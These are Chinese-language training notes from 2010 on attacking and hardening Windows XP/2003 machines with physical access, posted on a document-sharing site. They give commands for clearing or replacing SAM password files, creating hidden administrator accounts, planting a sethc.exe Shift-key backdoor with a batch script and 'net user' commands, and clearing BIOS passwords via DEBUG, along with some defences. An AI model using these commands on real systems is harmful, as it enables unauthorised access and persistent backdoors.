安全速成班笔记2010-10-6.docVIP

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
安全速成班笔记2010-10-6

安全速成笔记 一、密码保存位置: Windows XP /2003(C:\windows\system32\config\sam 不可复制,不可删除 系统密码 DOS破解 可通过 1硬盘DOS 2、光盘 3、U盘 4、 网络(小型FTPserver)来破解系统密码! 1》直接清空所有密码( dos下password.exe) 优点:简单易操作 不足:密码清空,容易发现 2》替换法.(已知密码sam文件) D:Copy sam c:\windows\system32\config\sam 破解系统密码步骤: 先备份原有SAM文件 清空密码,进入系统 完成后,恢复原有sam文件 PE破解(简单易操作) ( 增加隐藏账号 隐藏账号: PE增加超级管理账号 增加隐藏账号 以管理员身份进入系统 创建用户( 导出用户的注册表(导出管理员注册表(修改用户注册表权限(删除用户(导入注册表 硬盘/U盘( 利用 1、 复制替换 2、 password.exe 3、 pe password.exe (pe下密码工具) 网络启动破解: 架设服务端:小型FTP server 操作机以网卡启动加载破解程序… Shift后门. C:\windows\system32\ C:\windows\system32\Dllcache CMD.exe(net user administrator yh @echo off 不显示命令结果 copy sethc.exe c:\windows\system32\ /y --将sethc.exe复制到c:\windows\system32(如重复不提示) copy sethc.exe c:\windows\system32\dllcache /y --将sethc.exe复制到c:\windows\system32\dllcache(如重复不提示) 修改密码: Net user 用户名 密码 Net user administrator yh 增加用户 Net user 用户名 密码 /add Net user fj fj /add 将用户设为管理员 Net localgroup 管理员组 用户名 /add Net localgroup administrators fj /add 防范: C:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe @echo off del /q c:\windows\system32\sethc.exe 删除sechc.exe del /q c:\windows\system32\dllcache\sethc.exe –删除sethc.exe系统备份 md c:\windows\system32\sethc.exe 创建免疫文件 md c:\windows\system32\sethc.exe\fj..\ md c:\windows\system32\dllcache\sethc.exe md c:\windows\system32\dllcache\sethc.exe\fj..\ 如何防范: 密码的强度和策略 2.对系统进行二次加密: 开始运行syskey Syskey主要系统主要文件进行md5加密 破解 进行系统文件替换 C:\windows\repair\ C:\windows\system32\config?? 通过DOS或者PE 硬件加密: Bios设置启动管理 Bios密码 Bios密码破解 跳线放电 去除CMOS密码: Debug 去除密码:》??? -o 70 20 -o 71 21 -q 方法一 -o 70 16 -o 71 16 -q 方法二 -o 70 11 -o 71 ff -q 方法三 -o 70 10 -o 71 10 -q 方法四 -o 70 23 -o 71 34 -q 方法五 -o 70 10 -o 71 ff -q 方法六 -o 70 90 -o 71 91 -q CMOS CMOS防范:设置开机bios密码 破解: 跳线放电 电池放电 限制别人使用.doc 分区类型:NTFS. 创建一个属于自已的账号. 利用ntfs权限只允许自已打开. 隐藏安全选项 不显示自已账号,只显示账号(注册表) 不显示硬盘分区 USB的限制  方法一,BIOS设置法    进入BIOS设置,选择“Integrated Peripherals”选项,展开后将“USB 1.1 Controller”和“USB 2.0 Contr01ler”选项的属性设置为“Disableed”,即可禁用

文档评论(0)

jgx3536 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

版权声明书
用户编号:6111134150000003

1亿VIP精品文档

相关文档